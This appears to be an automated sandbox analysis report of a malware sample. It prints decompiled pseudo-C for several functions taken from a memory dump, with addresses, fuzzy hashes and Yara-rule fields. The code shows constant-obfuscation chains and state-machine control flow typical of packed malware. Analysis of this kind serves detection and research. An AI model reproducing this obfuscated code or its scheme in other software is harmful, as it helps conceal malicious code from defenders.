                                              0x00235f92
                                              0x00235f94
                                              0x00235f99
                                              0x0023600b
                                              0x00236013
                                              0x00236013
                                              0x00235f9b
                                              0x00000000
                                              0x00235f9b
                                              0x00235f52
                                              0x00235ffd
                                              0x00236007
                                              0x00236009
                                              0x00236009
                                              0x00000000
                                              0x00236007
                                              0x00235f5e
                                              0x00000000
                                              0x00000000
                                              0x00235f60
                                              0x00235f60
                                              0x00235fab
                                              0x00235fac
                                              0x00235fb4
                                              0x00235fba
                                              0x00235fc6
                                              0x00000000
                                              0x00235fc6
                                              0x00235fbc
                                              0x00000000
                                              0x00235fcb
                                              0x00235fcb
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                              • Instruction ID: 36cffe11ec14a5d73b83360e1001a7895bec2d7bde001db02f68dc376432eb4c
                                              • Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                              • Instruction Fuzzy Hash: EF9147B2C1021AABDF19CFE5D98A5EEBFB5FF04314F208109E61176260D3B94A25CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00230F0C, Relevance: .2, Instructions: 163COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E00230F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E00237AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E00237AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E00228736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}




























                                              0x00230f15
                                              0x00230f18
                                              0x00230f1a
                                              0x00230f1c
                                              0x00230f1f
                                              0x00230f22
                                              0x00230f24
                                              0x00230f25
                                              0x00230f26
                                              0x00230f2b
                                              0x00230f32
                                              0x00230f35
                                              0x00230f3e
                                              0x00230f45
                                              0x00230f47
                                              0x00230f4e
                                              0x00230f53
                                              0x00230f5a
                                              0x00230f62
                                              0x00230f67
                                              0x00230f6c
                                              0x00230f73
                                              0x00230f7d
                                              0x00230f82
                                              0x00230f8a
                                              0x00230f8f
                                              0x00230f97
                                              0x00230f9c
                                              0x00230fa1
                                              0x00230fa8
                                              0x00230faf
                                              0x00230fb6
                                              0x00230fbd
                                              0x00230fc4
                                              0x00230fc8
                                              0x00230fcf
                                              0x00230fd6
                                              0x00230fdd
                                              0x00230fe4
                                              0x00230feb
                                              0x00230ff2
                                              0x00230ffc
                                              0x00230fff
                                              0x00231002
                                              0x00231009
                                              0x00231010
                                              0x00231017
                                              0x0023101e
                                              0x00231025
                                              0x0023102c
                                              0x00231033
                                              0x0023103a
                                              0x00231041
                                              0x00231045
                                              0x0023104c
                                              0x00231053
                                              0x0023105a
                                              0x0023105d
                                              0x00231064
                                              0x0023106b
                                              0x00231072
                                              0x00231079
                                              0x00231084
                                              0x00231087
                                              0x0023108a
                                              0x00231091
                                              0x00231098
                                              0x0023109f
                                              0x002310a6
                                              0x002310ad
                                              0x002310b4
                                              0x002310b4
                                              0x002310c2
                                              0x002310f5
                                              0x002310fa
                                              0x002310fc
                                              0x00231101
                                              0x00231103
                                              0x00000000
                                              0x00231103
                                              0x002310c4
                                              0x002310ca
                                              0x00231157
                                              0x002310cc
                                              0x002310d2
                                              0x00000000
                                              0x002310d4
                                              0x002310d4
                                              0x00000000
                                              0x002310d4
                                              0x002310d2
                                              0x002310ca
                                              0x00231160
                                              0x00231167
                                              0x00231167
                                              0x00231113
                                              0x00231114
                                              0x0023111d
                                              0x00231123
                                              0x0023112c
                                              0x00000000
                                              0x00231125
                                              0x00231125
                                              0x00000000
                                              0x00231125
                                              0x00000000
                                              0x00231131
                                              0x00231131
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                              • Instruction ID: e238bbf47414ea4e4bb0ad0629637f45aae5949ecef84e52b08756d05dbd2265
                                              • Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                              • Instruction Fuzzy Hash: 30617EB2D1130AEBDF18CFA5D9859EEBBB2FF44314F248219E512B6290D3B54A518F90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022F444, Relevance: .1, Instructions: 128COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E0022F444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0x23ca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0x23ca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0x23ca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E0022F536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E0023086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E0023422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E00234F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

























                                              0x0022f444
                                              0x0022f445
                                              0x0022f460
                                              0x0022f451
                                              0x0022f45a
                                              0x0022f45a
                                              0x0022f45d
                                              0x0022f45d
                                              0x0022f464
                                              0x0022f467
                                              0x002398a6
                                              0x002398a9
                                              0x002398b2
                                              0x002398c1
                                              0x002398c3
                                              0x002398c8
                                              0x002398cd
                                              0x002398d2
                                              0x002398d6
                                              0x002398dd
                                              0x002398e8
                                              0x002398e9
                                              0x002398ec
                                              0x002398f3
                                              0x002398fa
                                              0x00239901
                                              0x00239905
                                              0x0023990c
                                              0x00239913
                                              0x0023991c
                                              0x0023991f
                                              0x00239926
                                              0x0023992d
                                              0x00239934
                                              0x00239937
                                              0x0023993b
                                              0x00239942
                                              0x00239949
                                              0x0023994d
                                              0x00239951
                                              0x00239958
                                              0x0023995f
                                              0x00239966
                                              0x0023996a
                                              0x00239971
                                              0x00239978
                                              0x0023997f
                                              0x00239986
                                              0x0023998d
                                              0x00239994
                                              0x0023999b
                                              0x002399a6
                                              0x002399a9
                                              0x002399b0
                                              0x002399b7
                                              0x002399be
                                              0x002399c1
                                              0x002399c8
                                              0x002399cf
                                              0x002399d3
                                              0x002399d7
                                              0x002399de
                                              0x00239a46
                                              0x002399ea
                                              0x00239a2e
                                              0x00239a3b
                                              0x00239a3d
                                              0x002399ec
                                              0x002399f9
                                              0x002399fe
                                              0x00239a04
                                              0x00239a51
                                              0x00239a51
                                              0x00239a06
                                              0x00239a0d
                                              0x00239a19
                                              0x00239a27
                                              0x00000000
                                              0x00239a2d
                                              0x00239a04
                                              0x00239a44
                                              0x00239a44
                                              0x00239a50

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab40681f94de22381ca7570a26f5348c257aec00c47af56da7adaef63678484c
                                              • Instruction ID: 30026303873513bf40a31bf3e97b1c794f12aa2ec590be87bafd65a7e85dc3d5
                                              • Opcode Fuzzy Hash: ab40681f94de22381ca7570a26f5348c257aec00c47af56da7adaef63678484c
                                              • Instruction Fuzzy Hash: 6E516472D00319EBDB18DFA4D98A9DEFBB0FB08318F208159D516772A0C7B46A95CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002371EF, Relevance: .1, Instructions: 123COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002371EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E0022602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E002350F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E0022B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E00221280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E00226754(_v60,  &_v52);
						} else {
							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E00228F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E002326F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E00224A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E002269A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}





























                                              0x002371ef
                                              0x002371fa
                                              0x002371ff
                                              0x00237201
                                              0x00237206
                                              0x00237210
                                              0x00237219
                                              0x00237220
                                              0x00237222
                                              0x00237229
                                              0x00237230
                                              0x00237237
                                              0x0023723b
                                              0x00237242
                                              0x00237249
                                              0x00237250
                                              0x00237254
                                              0x0023725e
                                              0x00237260
                                              0x00237263
                                              0x0023726a
                                              0x00237271
                                              0x00237275
                                              0x0023727c
                                              0x0023727f
                                              0x00237286
                                              0x0023728d
                                              0x00237290
                                              0x00237297
                                              0x0023729e
                                              0x002372a2
                                              0x002372a9
                                              0x002372b0
                                              0x002372bb
                                              0x002372be
                                              0x002372c5
                                              0x002372cc
                                              0x002372d3
                                              0x002372da
                                              0x002372ec
                                              0x002372ef
                                              0x002372f6
                                              0x00237306
                                              0x0023730b
                                              0x00237384
                                              0x0023739e
                                              0x00237324
                                              0x00237329
                                              0x0023732c
                                              0x0023732e
                                              0x00237333
                                              0x00237333
                                              0x00237334
                                              0x0023737e
                                              0x00237336
                                              0x00237336
                                              0x00237336
                                              0x00237337
                                              0x00237371
                                              0x00237339
                                              0x00237339
                                              0x00237339
                                              0x0023733a
                                              0x00237364
                                              0x0023733c
                                              0x0023733c
                                              0x0023733c
                                              0x0023733d
                                              0x00237357
                                              0x0023733f
                                              0x0023733f
                                              0x00237342
                                              0x0023734a
                                              0x0023734a
                                              0x00237342
                                              0x0023733d
                                              0x0023733a
                                              0x00237337
                                              0x00237383
                                              0x00237383
                                              0x00237383
                                              0x00000000
                                              0x0023732e
                                              0x002373ab

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                              • Instruction ID: 527278b05630599ec47ad7761af277311b54ce431ed92775ac6e3f76f315e5f7
                                              • Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                              • Instruction Fuzzy Hash: 6D5157B1D2421EABDF14DFE0D8858EEBBB5FF44304F108159D411B6290D7B85A59CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00238ADC, Relevance: .1, Instructions: 114COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00238ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E0022F22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E00238634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E00230126(_v32, _v24);
					}
					_t115 = E00234AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}






















                                              0x00238ae5
                                              0x00238aee
                                              0x00238af5
                                              0x00238afc
                                              0x00238b03
                                              0x00238b0e
                                              0x00238b10
                                              0x00238b15
                                              0x00238b1a
                                              0x00238b21
                                              0x00238b28
                                              0x00238b2f
                                              0x00238b36
                                              0x00238b3d
                                              0x00238b44
                                              0x00238b4b
                                              0x00238b52
                                              0x00238b59
                                              0x00238b60
                                              0x00238b67
                                              0x00238b6e
                                              0x00238b75
                                              0x00238b7c
                                              0x00238b83
                                              0x00238b8a
                                              0x00238b92
                                              0x00238b95
                                              0x00238b98
                                              0x00238b9f
                                              0x00238ba6
                                              0x00238baa
                                              0x00238bb1
                                              0x00238bb8
                                              0x00238bbc
                                              0x00238bc0
                                              0x00238bc7
                                              0x00238bce
                                              0x00238bdc
                                              0x00238bdf
                                              0x00238be6
                                              0x00238bed
                                              0x00238bf8
                                              0x00238bf9
                                              0x00238c01
                                              0x00238c07
                                              0x00238c0a
                                              0x00238c11
                                              0x00238c22
                                              0x00238c22
                                              0x00238c26
                                              0x00000000
                                              0x00000000
                                              0x00238c1c
                                              0x00238c2a
                                              0x00238c1e
                                              0x00238c1e
                                              0x00238c20
                                              0x00238c21
                                              0x00000000
                                              0x00238c21
                                              0x00238c2d
                                              0x00238c42
                                              0x00238c48
                                              0x00238c66
                                              0x00238c7f
                                              0x00238c80
                                              0x00000000
                                              0x00238c86
                                              0x00238c59
                                              0x00238c5e
                                              0x00238c64
                                              0x00000000
                                              0x00000000
                                              0x00238c8e
                                              0x00238c8e
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                              • Instruction ID: 82a7fd0648988a539e0a5433a8af3219ca3ebe04d4972db08f23cb31bd60efbb
                                              • Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                              • Instruction Fuzzy Hash: 10514271C0121ADBEF48CFA0D94A5EEBBB1FB44304F20819AD011BA2A0D7B91B55CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002248BD, Relevance: .1, Instructions: 107COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 89%
                                              			E002248BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0x23c110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E00228736(_t105);
				 *0x23ca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0x23c110;
				 *_t95 = 0x23c110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0x23c110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E00221CFA(_v32, _t122) == 0) {
					E0022F536(_v36, _v28, _v24,  *0x23ca38);
					goto L7;
				}
				return 1;
			}





















                                              0x002248cb
                                              0x002248cd
                                              0x002248ce
                                              0x002248d1
                                              0x002248d4
                                              0x002248d5
                                              0x002248d6
                                              0x002248db
                                              0x002248e4
                                              0x002248e9
                                              0x002248ec
                                              0x002248f3
                                              0x002248f7
                                              0x002248fb
                                              0x00224902
                                              0x00224909
                                              0x0022490d
                                              0x00224914
                                              0x0022491b
                                              0x00224922
                                              0x0022492e
                                              0x00224933
                                              0x0022493c
                                              0x00224940
                                              0x00224943
                                              0x0022494a
                                              0x00224951
                                              0x00224958
                                              0x0022495c
                                              0x00224963
                                              0x0022496a
                                              0x00224971
                                              0x00224978
                                              0x0022497f
                                              0x00224986
                                              0x0022498d
                                              0x00224994
                                              0x0022499b
                                              0x002249a8
                                              0x002249ab
                                              0x002249b2
                                              0x002249b9
                                              0x002249c2
                                              0x002249c3
                                              0x002249c6
                                              0x002249d6
                                              0x002249db
                                              0x002249e4
                                              0x00224a2c
                                              0x00000000
                                              0x00224a2c
                                              0x002249e6
                                              0x002249e9
                                              0x002249ec
                                              0x002249ee
                                              0x002249f7
                                              0x002249f3
                                              0x002249f4
                                              0x002249f4
                                              0x00224a0f
                                              0x00224a25
                                              0x00000000
                                              0x00224a2b
                                              0x00000000

                                              Memory Dump Source
